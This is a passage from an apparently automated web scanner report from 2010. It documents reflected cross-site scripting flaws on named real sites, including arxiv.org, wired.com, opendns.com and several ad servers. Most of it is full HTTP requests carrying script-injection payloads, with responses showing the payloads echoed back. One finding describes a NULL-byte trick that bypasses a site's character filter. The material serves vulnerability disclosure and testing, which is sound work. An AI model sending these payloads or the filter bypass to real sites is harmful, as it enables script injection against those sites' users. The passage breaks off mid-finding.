The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 19375<script>alert(1)</script>1132cb8b8bf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /abs/1003.044919375<script>alert(1)</script>1132cb8b8bf HTTP/1.1 Host: arxiv.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 22 Nov 2010 01:32:45 GMT Server: Apache Set-Cookie: browser=174.121.222.18.1290389565166801; path=/; max-age=946080000; domain=.arxiv.org Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 1800
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <h1>Paper identifier '1003.044919375<script>alert(1)</script>1132cb8b8bf' not recognized</h2> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 3a16c</title><script>alert(1)</script>c9c8fd9cb5e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /abs/1011.37073a16c</title><script>alert(1)</script>c9c8fd9cb5e HTTP/1.1 Host: arxiv4.library.cornell.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 22 Nov 2010 01:32:47 GMT Server: Apache Set-Cookie: browser=174.121.222.18.1290389567349336; path=/; max-age=946080000; domain=.arxiv.org Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 1824
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <title>[1011.37073a16c</title><script>alert(1)</script>c9c8fd9cb5e] Bad paper identifier</title> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4e1c1<script>alert(1)</script>0f8702ef860 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /abs/1011.37074e1c1<script>alert(1)</script>0f8702ef860 HTTP/1.1 Host: arxiv4.library.cornell.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 22 Nov 2010 01:32:45 GMT Server: Apache Set-Cookie: browser=174.121.222.18.1290389565501583; path=/; max-age=946080000; domain=.arxiv.org Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 1800
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <h1>Paper identifier '1011.37074e1c1<script>alert(1)</script>0f8702ef860' not recognized</h2> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13199"><script>alert(1)</script>c1eaaf68b6c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe13199"><script>alert(1)</script>c1eaaf68b6c/3.0/5113.1/221794/0/-1/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956 HTTP/1.1 Host: at.atwola.com Proxy-Connection: keep-alive Referer: http://www.tuaw.com/?b942f%22-alert(1)-%220fce9fc0f52=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: atdses=O; JEB2=4CD6406B6E651A44E171CE41F0006986
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 350
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7d3d"><script>alert(1)</script>c653d13393c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0b7d3d"><script>alert(1)</script>c653d13393c/5113.1/221794/0/-1/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956 HTTP/1.1 Host: at.atwola.com Proxy-Connection: keep-alive Referer: http://www.tuaw.com/?b942f%22-alert(1)-%220fce9fc0f52=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: atdses=O; JEB2=4CD6406B6E651A44E171CE41F0006986
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 350
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd1bb"><script>alert(1)</script>795dc3822fb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.1fd1bb"><script>alert(1)</script>795dc3822fb/221794/0/-1/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956 HTTP/1.1 Host: at.atwola.com Proxy-Connection: keep-alive Referer: http://www.tuaw.com/?b942f%22-alert(1)-%220fce9fc0f52=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: atdses=O; JEB2=4CD6406B6E651A44E171CE41F0006986
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 350
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3b81"><script>alert(1)</script>d7b136c3cd7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.1/221794d3b81"><script>alert(1)</script>d7b136c3cd7/0/-1/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956 HTTP/1.1 Host: at.atwola.com Proxy-Connection: keep-alive Referer: http://www.tuaw.com/?b942f%22-alert(1)-%220fce9fc0f52=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: atdses=O; JEB2=4CD6406B6E651A44E171CE41F0006986
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 350
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc8ef"><script>alert(1)</script>2480ed798e2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.1/221794/0cc8ef"><script>alert(1)</script>2480ed798e2/-1/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956 HTTP/1.1 Host: at.atwola.com Proxy-Connection: keep-alive Referer: http://www.tuaw.com/?b942f%22-alert(1)-%220fce9fc0f52=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: atdses=O; JEB2=4CD6406B6E651A44E171CE41F0006986
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 350
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0eb1"><script>alert(1)</script>6026b3de44a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.1/221794/0/-1e0eb1"><script>alert(1)</script>6026b3de44a/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956 HTTP/1.1 Host: at.atwola.com Proxy-Connection: keep-alive Referer: http://www.tuaw.com/?b942f%22-alert(1)-%220fce9fc0f52=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: atdses=O; JEB2=4CD6406B6E651A44E171CE41F0006986
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 350
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee20a"><script>alert(1)</script>b927cf1665f was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.1/221794/0/-1/sizeee20a"><script>alert(1)</script>b927cf1665f=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956 HTTP/1.1 Host: at.atwola.com Proxy-Connection: keep-alive Referer: http://www.tuaw.com/?b942f%22-alert(1)-%220fce9fc0f52=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: atdses=O; JEB2=4CD6406B6E651A44E171CE41F0006986
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 350
1.96. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://at.atwola.com
Path:
/adiframe/3.0/5113.1/221794/0/-1/size=300x250
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc670"><script>alert(1)</script>e55e2aeba0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.1/221794/0/-1/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956&fc670"><script>alert(1)</script>e55e2aeba0c=1 HTTP/1.1 Host: at.atwola.com Proxy-Connection: keep-alive Referer: http://www.tuaw.com/?b942f%22-alert(1)-%220fce9fc0f52=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: atdses=O; JEB2=4CD6406B6E651A44E171CE41F0006986
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 353
The value of the noperf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ed98"><script>alert(1)</script>b265eeb37a0 was submitted in the noperf parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.1/221794/0/-1/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=3815709563ed98"><script>alert(1)</script>b265eeb37a0 HTTP/1.1 Host: at.atwola.com Proxy-Connection: keep-alive Referer: http://www.tuaw.com/?b942f%22-alert(1)-%220fce9fc0f52=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: atdses=O; JEB2=4CD6406B6E651A44E171CE41F0006986
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 350
1.98. http://boxing.fanhouse.com/2010/11/13/pacquiao-vs-margarito-results-live-updates-of-undercard-and-ma/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96dad"-alert(1)-"01208aaeb95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2010/11/13/pacquiao-vs-margarito-results-live-updates-of-undercard-and-ma/?96dad"-alert(1)-"01208aaeb95=1 HTTP/1.1 Host: boxing.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.99. http://boxing.fanhouse.com/2010/11/13/pacquiao-vs-margarito-results-live-updates-of-undercard-and-ma/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6954"><script>alert(1)</script>40c64d26d0b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/13/pacquiao-vs-margarito-results-live-updates-of-undercard-and-ma/?f6954"><script>alert(1)</script>40c64d26d0b=1 HTTP/1.1 Host: boxing.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://boxing.fanhouse.com/2010/11/13/pacquiao-vs-margarito-results-live-updates-of-undercard-and-ma/?f6954"><script>alert(1)</script>40c64d26d0b=1"/> ...[SNIP]...
1.100. http://cde.cerosmedia.com/WIRED_MAY_SAMPLER/1S4bb37141d5ff4012.cde [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cde.cerosmedia.com
Path:
/WIRED_MAY_SAMPLER/1S4bb37141d5ff4012.cde
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74bdf</script><script>alert(1)</script>fbf4f8394ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /WIRED_MAY_SAMPLER/1S4bb37141d5ff4012.cde?74bdf</script><script>alert(1)</script>fbf4f8394ac=1 HTTP/1.1 Host: cde.cerosmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 22 Nov 2010 01:52:51 GMT Server: Apache Set-Cookie: CerosStats=aWR8ZGExNDc5NmJkM2Y1N2EyZDVjMDA0MTY5OGE3YzU5NGQ%3D; expires=Thu, 19-Nov-2020 01:52:51 GMT; path=/; domain=.cerosmedia.com Content-Length: 7488 Connection: close Content-Type: text/html;charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of the offerid request parameter is copied into the HTML document as plain text between tags. The payload 12c1f<script>alert(1)</script>7027a7ea3c was submitted in the offerid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 400 Bad Request Server: Apache-Coyote/1.1 Content-Length: 257 Date: Mon, 22 Nov 2010 01:34:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>Error</title></head><body> Bad number format in offerid: For input string: "12c1f<script>alert(1)</script>7027a7ea3c" </body> ...[SNIP]...
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload cdaef<script>alert(1)</script>0e666a83707 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /json.js?url=%2Fculture%2Fart%2Fmultimedia%2F2008%2F07%2Fgallery_faves_food&uid=&offset=0&callback=commentBroker.handleEventcdaef<script>alert(1)</script>0e666a83707&eventName=comments_0&markdown=true&limit=10 HTTP/1.1 Host: comments.wired.com Proxy-Connection: keep-alive Referer: http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food?f56a1%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __unam=c1361f6-12c7006e158-7792a530-1; mobify=0
Response
HTTP/1.1 200 OK Content-Type: text/javascript; charset=UTF-8 Server: Spezserver/0.1 Vary: Accept-Encoding X-N: S Date: Mon, 22 Nov 2010 01:40:43 GMT Connection: close Content-Length: 3429
The value of the eventName request parameter is copied into the HTML document as plain text between tags. The payload c37f4<script>alert(1)</script>76a0335a7e3 was submitted in the eventName parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /json.js?url=%2Fculture%2Fart%2Fmultimedia%2F2008%2F07%2Fgallery_faves_food&uid=&offset=0&callback=commentBroker.handleEvent&eventName=comments_0c37f4<script>alert(1)</script>76a0335a7e3&markdown=true&limit=10 HTTP/1.1 Host: comments.wired.com Proxy-Connection: keep-alive Referer: http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food?f56a1%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __unam=c1361f6-12c7006e158-7792a530-1; mobify=0
Response
HTTP/1.1 200 OK Content-Type: text/javascript; charset=UTF-8 Server: Spezserver/0.1 Vary: Accept-Encoding X-N: S Date: Mon, 22 Nov 2010 01:40:48 GMT Connection: close Content-Length: 3429
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007fc71"><script>alert(1)</script>f888a9f8a9b was submitted in the REST URL parameter 1. This input was echoed as 7fc71"><script>alert(1)</script>f888a9f8a9b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00dc217"><script>alert(1)</script>304ac110a42 was submitted in the REST URL parameter 2. This input was echoed as dc217"><script>alert(1)</script>304ac110a42 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
1.106. http://ideabank.opendns.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ideabank.opendns.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89e1f"><script>alert(1)</script>2b044539dbc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?89e1f"><script>alert(1)</script>2b044539dbc=1 HTTP/1.1 Host: ideabank.opendns.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OPENDNS_ACCOUNT=529fbcc8cec610ec6661657a296dbfc8; __kti=1289593273346,http%3A%2F%2Fideabank.opendns.com%2Fupcoming.php%3Fca37d%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ecc21d24e55d%3D1,; __ktv=5926-ef2-1156-d97312c41bfbc05; __utmx=207386316.00012306182230551517:3:3; __utmxx=207386316.00012306182230551517:1773685:2592000; __utmz=207386316.1290263893.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=http://opendns.com/; __utma=207386316.1945980142.1290263893.1290263893.1290263893.1
Response
HTTP/1.1 200 OK Date: Mon, 22 Nov 2010 01:51:30 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 104500
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9be87"%3balert(1)//363c5691df7 was submitted in the mpck parameter. This input was echoed as 9be87";alert(1)//363c5691df7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/3992/crucial_knows_notebook_160x600.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F3992-114624-33380-1%3Fmpt%3D4949634979be87"%3balert(1)//363c5691df7&mpt=494963497&mpvc= HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.xml.com/pub/a/2003/07/23/extendingrss.html?99584--%3E%3Cscript%3Ealert(1)%3C/script%3E0a38ce97934=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=OPT-OUT; __utmz=183366586.1289108887.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.1043956060.1289108887.1289108887.1289108887.1
Response
HTTP/1.1 200 OK Date: Mon, 22 Nov 2010 01:51:51 GMT Server: Apache Last-Modified: Thu, 07 Oct 2010 19:53:04 GMT ETag: "6466be-b9e-4920c3dfb8800" Accept-Ranges: bytes Content-Length: 4081 Content-Type: application/x-javascript
function MediaplexFlashAOL(){ var mp_swver = 0, mp_html = "";
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc9e4"%3balert(1)//be7622a1d03 was submitted in the mpvc parameter. This input was echoed as fc9e4";alert(1)//be7622a1d03 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/3992/crucial_knows_notebook_160x600.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F3992-114624-33380-1%3Fmpt%3D494963497&mpt=494963497&mpvc=fc9e4"%3balert(1)//be7622a1d03 HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.xml.com/pub/a/2003/07/23/extendingrss.html?99584--%3E%3Cscript%3Ealert(1)%3C/script%3E0a38ce97934=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=OPT-OUT; __utmz=183366586.1289108887.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.1043956060.1289108887.1289108887.1289108887.1
Response
HTTP/1.1 200 OK Date: Mon, 22 Nov 2010 01:51:54 GMT Server: Apache Last-Modified: Thu, 07 Oct 2010 19:53:04 GMT ETag: "6466be-b9e-4920c3dfb8800" Accept-Ranges: bytes Content-Length: 4057 Content-Type: application/x-javascript
function MediaplexFlashAOL(){ var mp_swver = 0, mp_html = "";
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f85d9"%3balert(1)//b20b8991dcf was submitted in the mpck parameter. This input was echoed as f85d9";alert(1)//b20b8991dcf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
